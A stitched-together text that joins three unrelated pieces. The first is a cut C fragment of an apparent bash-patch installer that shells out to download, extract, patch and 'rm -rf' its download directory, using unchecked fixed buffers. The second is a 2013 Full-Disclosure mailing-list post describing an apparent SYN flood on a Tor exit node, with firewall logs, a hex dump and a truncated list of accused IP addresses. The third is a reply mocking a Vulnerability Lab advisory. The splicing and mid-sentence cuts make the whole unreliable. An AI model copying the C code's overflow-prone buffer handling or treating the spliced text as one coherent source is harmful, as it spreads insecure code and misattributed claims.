	compile_geinpeek_bash();

	printf("\n");
	
	make_install();
	
	SET_ANSI();
	fprintf(stdout, "%s\n", cong);
	UNSET_ANSI();

	make_clean();

}

#define	OK_MARK		"200 OK"

int download_file(char *src_url)
{
	char sho[128];
	FILE *pfp;
	char msg_buf[2048];
	unsigned int indx = 0;

	sprintf(sho, "%s %s -P %s", needed[2], src_url, DOWNLOAD_DIR);

	if((pfp = popen(sho, "r")) == NULL){
		fprintf(stderr, "\n\n%s : error\n\n", sho);
		goto failed;
	}

	while(!feof(pfp))
		msg_buf[indx++] = fgetc(pfp);

	if(strstr(msg_buf, OK_MARK) != NULL){
		fprintf(stderr, "\n\n%s : source code file not found\n\n", src_url);
		goto failed;
	}


success:
	pclose(pfp);
	return(0);

failed:
	pclose(pfp);
	make_clean();

}


void make_clean()
{
	char sho[128];

	sprintf(sho, "rm -rf %s\n", DOWNLOAD_DIR);
	system(sho);

	printf("cleanup: rm -rf %s\n", DOWNLOAD_DIR);

	printf("bye!\n");

	exit(1);

}


int checking_file(char *bin_file)
{
	return access(bin_file, X_OK);
}

#define	ERROR_MARK	"Error exit"

int xtract_package(char *src_url)
{
char sho[128];
FILE *pfp;
char msg_buf[65535];
unsigned int indx = 0, indxx = 0;
	char *src_file;


	/* real filename extract from the URL */

	
	if((src_file = strrchr(src_url, '/')) == NULL){
		fprintf(stderr, "\n\n%s : invalid URL\n\n", src_url);
		goto failed;
	}
	
sprintf(sho, "%s xzvf %s%s -C %s", needed[3], DOWNLOAD_DIR, src_file, DOWNLOAD_DIR);

if((pfp = popen(sho, "r")) == NULL){
fprintf(stderr, "\n\n%s : error\n\n", sho);
goto failed;
}

while(!feof(pfp))
msg_buf[indx++] = fgetc(pfp);

if(strstr(msg_buf, ERROR_MARK) != NULL){
fprintf(stderr, "\n\n%s : source code file extract error\n\n", src_file);
goto failed;
}


success:
pclose(pfp);
return(0);

failed:
pclose(pfp);
make_clean();
		
}

void select_and_patch()
{
	unsigned int indsx = 0;
	char sho[128];
	char c;

	for(indsx = 0; needed_patch_list[indsx][0] != '\x00'; indsx++){
		sprintf(sho, "mv %s/bash-3.0-geinpeek-0.2/%s %s/bash-3.0", 
			DOWNLOAD_DIR, needed_patch_list[indsx], DOWNLOAD_DIR);
		system(sho);

if(strstr(needed_patch_list[indsx], ".diff") != NULL){
			printf("needed patch : %s [ applied ]\n", needed_patch_list[indsx]);
			sprintf(sho, "cd %s/bash-3.0/; patch -f < %s", DOWNLOAD_DIR, needed_patch_list[indsx]);
			system(sho);
		}
	}

for(indsx = 0; patchkit_list[indsx][0] != '\x00'; indsx++){
sprintf(

[Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Luther Blissett 
Hello dear companions,

Two days ago one of my tor exit nodes experienced something I'm now
calling "limestonenetworks DDoS on polipo" ( $WAN_IP:8123 ), since all
packets in the storm were flowing from a range of 514 different IP
addresses, all of them inside limestonenetworks IP range and targeting
port 8123 on my tor exit node WAN IP.

Before the packet storm, I could observe a huge increase on attempts to
access my WAN domain through tor. I couldn't relate IP addresses from
this first raise to those responsible for the actual packet storm nor
could I identify some useful pattern there, but they were all coming
from port 9001 and increased just some hours before the storm, so I'm
guessing they are related somehow.

Also, throughout the storm, one of my log files got corrupted with some
unreadable bin garbage. I do not know if it was intended/targeted
exploit, but I'm reworking secrets and trying to figure out what is this
binary.

Here is a sample line of a WAN attempt:

Aug 13 16:50:22 $USER user.warn kernel: [DROP INVALID WAN] : IN=vlan2
OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx
SRC=77.56.151.190 DST=xxx.xxx.xxx.xxx LEN=52 TOS=0x00 PREC=0x00 TTL=43
ID=38787 DF PROTO=TCP SPT=40888 DPT=9001 SEQ=289854459 ACK=41163

Here is a sample line of packet storm:

Aug 13 20:39:14 $USER user.warn kernel: [hammer] : IN=vlan2 OUT=
MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx
SRC=74.63.216.60 DST=xxx.xxx.xxx.xxx LEN=52 TOS=0x00 PREC=0x00 TTL=48
ID=20269 DF PROTO=TCP SPT=1757 DPT=8123 WINDOW=65535 RES=0x00 SYN URGP=0
OP

The attack persisted for at least three hours and left this binary (hex
represented):

000        
*
b90       2067 3331
ba0 3220 3a30 3135 303a 2034 6174 6567 7573
bb0 7568 7520 6573 2e72 6177 6e72 6b20 7265
bc0 656e 3a6c 5b20 6168 6d6d 7265 205d 203a
bd0 4e49 763d 616c 326e 4f20 5455 203d 414d
be0 3d43 3030 323a 3a31 3732 663a 3a61 6464
bf0 343a 3a34 3030 313a 3a35 3966 323a 3a61
c00 6639 643a 3a39 3830 303a 3a30 3534 303a
c10 3a30 3030 333a 2034 5253 3d43 3132 2e36
c20 3432 2e35 3232 2e31 3031 2037 5344 3d54
c30 3831 2e39 3833 322e 3533 322e 3035 4c20
c40 4e45 353d 2032 4f54 3d53 7830 3030 5020
c50 4552 3d43 7830 3030 5420 4c54 343d 2038
c60 4449 313d 3335 3431 4420 2046 5250 544f
c70 3d4f 4354 2050 5053 3d54 3932 3635 4420
c80 5450 383d 3231 2033 4957 444e 574f 363d
c90 3535 3533 5220 5345 303d 3078 2030 5953
ca0 204e 5255 5047 303d 000a   
ca9

Attached is the list of participating IP addresses, line by line, with
the count of packets received. The attacker started sending something
like 4 packets per second and increased to over than 9000!!! - just
kidding, over 30 per second.

JSYK, I welcome any comments.
74.63.255.118: 248 
216.245.193.201: 235 
208.115.232.205: 231 
74.63.255.119: 225 
216.245.193.200: 219 
216.245.193.202: 218 
216.245.193.198: 214 
74.63.255.120: 204 
216.245.220.57: 202 
64.31.63.156: 201 
216.245.193.203: 198 
74.63.255.116: 192 
69.162.76.137: 189 
64.31.63.153: 186 
216.245.220.56: 186 
208.115.218.170: 184 
74.63.255.74: 179 
74.63.255.117: 178 
74.63.218.58: 177 
69.162.71.236: 176 
64.31.11.137: 173 
69.162.71.232: 172 
216.245.220.59: 172 
64.31.58.200: 171 
216.245.193.199: 165 
64.31.63.154: 164 
208.115.230.158: 164 
69.162.76.138: 161 
69.162.119.46: 161 
69.162.119.44: 159 
69.162.71.235: 157 
74.63.244.202: 155 
64.31.63.152: 155 
64.31.11.142: 155 
216.144.253.39: 154 
64.31.58.204: 153 
64.31.58.203: 153 
216.245.220.58: 151 
69.162.76.139: 150 
69.162.71.233: 150 
64.31.58.202: 148 
64.31.63.155: 147 
64.31.58.201: 143 
216.144.253.40: 138 
74.63.218.56: 138 
216.245.193.197: 132 
74.63.252.233: 127 
69.162.76.136: 126 
208.115.218.173: 125 
208.115.229.125: 125 
74.63.255.115: 125 
64.31.50.99: 125 
74.63.252.234: 122 
64.31.50.98: 121 
64.31.63.158: 119 
208.115.240.190: 119 
208.115.240.188: 118 
208.115.212.73: 116 
208.115.232.204: 114 
74.63.216.61: 113 
74.63.252.235: 112 
208.115.240.189: 112 
74.63.218.57: 111 
216.144.253.41: 111 
64.31.63.157: 110 
208.115.232.206: 107 
216.245.222.114: 105 
69.162.76.253: 105 
208.115.218.174: 104 
64.31.11.136: 104 
74.63.216.62: 104 
64.31.58.205: 104 
69.162.109.29: 103 
64.31.11.138: 103 
64.31.50.100: 99 
74.63.252.232: 97 
216.144.253.36: 96 
69.162.125.230: 94 
69.162.76.140: 93 
69.162.119.39: 91 
74.63.244.206: 91 
208.115.240.187: 91 
208.115.229.126: 88 
69.162.71.234: 87 
208.115.212.72: 84 
74.63.255.114: 83 
69.162.109.30: 82 
64.31.50.101: 81 
69.162.125.228: 81 
64.31.53.24: 80 
74.63.237.194: 78 
64.31.53.26: 77 
74.63.218.66: 77 
69.162.126.27: 77 
74.63.237.195: 76 
74.63.255.75: 75 
216.144.253.42: 75 
216.245.221.107: 74 
208.115.228.51: 74 
64.31.53.25: 73 
64.31.53.27: 72 
64.31.38.5: 71 
208.115.229.46: 70 
69.162.71.237: 69 
74.63.221.251: 68 
69.162.100.87: 68 
64.31.38.2: 68 
63.143.51.243: 68 
208.115.212.

Re: [Full-disclosure] Google - (Pin via Postal Delivery) Information Disclosure - Video

2013-08-16 Thread Julius Kivimäki 
So, what exactly is this "advisory" supposed to be about?  The lack of your
camera skills? Or perhaps about the fact that google sent you a letter?
Oh, and I really wonder how you calculated your CVSS. The NVD calculator
comes up with 0 for me.


2013/8/16 Vulnerability Lab 

> Title:
> ==
> Google - (Pin via Postal Delivery) Information Disclosure :)
>
>
> Date:
> =
> 2013-08-15
>
>
> References:
> ===
> http://www.vulnerability-lab.com/get_content.php?id=1046
>
> View: http://www.youtube.com/watch?v=nnAAdX9a3eU
>
>
>
> VL-ID:
> =
> 1046
>
>
> Common Vulnerability Scoring System:
> 
> 4.5
>
>
> Status:
> 
> Published
>
>
> Exploitation-Technique:
> ===
> Defensiv
>
>
> Severity:
> =
> Medium
>
>
> Details:
> 
> The video shows the session of a german researcher of the laboratory. The
> video explains an information disclosure issue inside of
> the postal delivery infrastructure service of google to verify a business
> account.
>
>
> Credits:
> 
> Vulnerability Laboratory [Research Team]
>
>
> Disclaimer:
> ===
> The information provided in this advisory is provided as it is without any
> warranty. Vulnerability Lab disclaims all warranties,
> either expressed or implied, including the warranties of merchantability
> and capability for a particular purpose. Vulnerability-
> Lab or its suppliers are not liable in any case of damage, including
> direct, indirect, incidental, consequential loss of business
> profits or special damages, even if Vulnerability-Lab or its suppliers
> have been advised of the possibility of such damages. Some
> states do not allow the exclusion or limitation of liability for
> consequential or incidental damages so the foregoing limitation
> may not apply. We do not approve or encourage anybody to break any vendor
> licenses, policies, deface websites, hack into databases
> or trade with fraud/stolen material.
>
> Domains:www.vulnerability-lab.com   - www.vuln-lab.com
>   - www.evolution-sec.com
> Contact:ad...@vulnerability-lab.com -
> resea...@vulnerability-lab.com   - ad...@evolution-sec.com
> Section:www.vulnerability-lab.com/dev   -
> forum.vulnerability-db.com   -
> magazine.vulnerability-db.com
> Social: twitter.com/#!/vuln_lab -
> facebook.com/VulnerabilityLab-
> youtube.com/user/vulnerability0lab
> Feeds:  vulnerability-lab.com/rss/rss.php   -
> vulnerability-lab.com/rss/rss_upcoming.php   -
> vulnerability-lab.com/rss/rss_news.php
>
> Any modified copy or reproduction, including partially usages, of this
> file requires authorization from Vulnerability Laboratory.
> Permission to electronically redistribute this alert in its unmodified
> form is granted. All other rights, including the use of other
> media, are reserved by Vulnerability-Lab Research Team or its suppliers.
> All pictures, texts, advisories, source code, videos and
> other information on this website is trademark of vulnerability-lab team &
> the specific authors or managers. To record, list (feed),
> modify, use or edit our material contact (ad...@vulnerability-lab.com or
> resea...@vulnerability-lab.com) to get a permission.
>
> Copyright © 2013 | Vulnerability
> Laboratory [Evolution Security]
>
>
>
> --
> VULNERABILITY LABORATORY RESEARCH TEAM
> DOMAIN: www.vulnerability-lab.com
> CONTACT: resea...@vulnerability-lab.com
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/